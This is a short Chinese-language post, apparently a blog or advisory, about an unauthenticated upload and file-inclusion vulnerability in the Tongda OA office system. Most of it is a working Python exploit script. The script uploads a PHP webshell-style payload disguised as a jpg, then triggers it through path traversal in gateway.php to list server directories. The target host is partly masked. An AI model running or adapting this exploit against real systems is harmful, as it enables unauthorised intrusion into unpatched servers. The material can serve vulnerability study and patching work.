通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。

漏洞利用脚本

脚本来自:

https://github.com/Libraggbond/example/blob/40bff1422951a00fb850cbf4fdeec080ec5f2196/tongda.py

import requests
upload_url = "http://***.vsgo.cloud:7674/ispirit/im/upload.php"
exp_url = "http://***.vsgo.cloud:7674/ispirit/interface/gateway.php"
files = {'ATTACHMENT':('jpg','<?php $dir=isset($_GET["dir"])?$_GET["dir"]:".";var_dump(glob("$dir/*"));?>')}
data = {'P':123,'DEST_UID':'111','UPLOAD_MODE':1}
r = requests.post(upload_url,data=data,files=files)
file = r.json()['content']
filename = file.split("|")[0].split("_")[1]
path = file.split("|")[0].split("_")[0].split("@")[1]
exp_data = {"json":'{{"url":"../../ispirit/../../attach/im/{}/{}.jpg"}}'.format(path,filename)}
result = requests.post(exp_url,data=exp_data)
print(result.text)

利用成功将输出网站目录下的文件。

参考